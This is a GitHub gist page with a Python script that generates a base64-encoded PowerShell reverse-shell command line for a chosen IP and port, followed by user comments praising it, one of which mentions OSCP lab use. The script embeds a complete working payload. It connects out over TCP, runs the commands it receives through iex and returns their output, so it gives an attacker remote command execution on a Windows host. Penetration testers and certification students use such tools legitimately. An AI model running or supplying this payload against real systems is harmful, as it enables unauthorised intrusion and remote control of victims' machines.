Created
February 17, 2019 00:05
-
-
Save tothi/ab288fb523a4b32b51a53e542d40fe58 to your computer and use it in GitHub Desktop.
reverse PowerShell cmdline payload generator (base64 encoded)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# | |
# generate reverse powershell cmdline with base64 encoded args | |
# | |
import sys | |
import base64 | |
def help(): | |
print("USAGE: %s IP PORT" % sys.argv[0]) | |
print("Returns reverse shell PowerShell base64 encoded cmdline payload connecting to IP:PORT") | |
exit() | |
try: | |
(ip, port) = (sys.argv[1], int(sys.argv[2])) | |
except: | |
help() | |
# payload from Nikhil Mittal @samratashok | |
# https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3 | |
payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | |
payload = payload % (ip, port) | |
cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode() | |
print(cmdline) |
Awesome script!
thx ;)
This is great! it helped me a lot!
The only rev shell i needed for OSCP windows boxes! <3
This helped me greatly, thank you the escaping was annoying me
Certified goat!
Thank you very much, revshells.com seems to encode the entire command including "powershell", this is very convenient and helpful
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Simple but very effective script if formatting/escaping is an issue! Thanks :)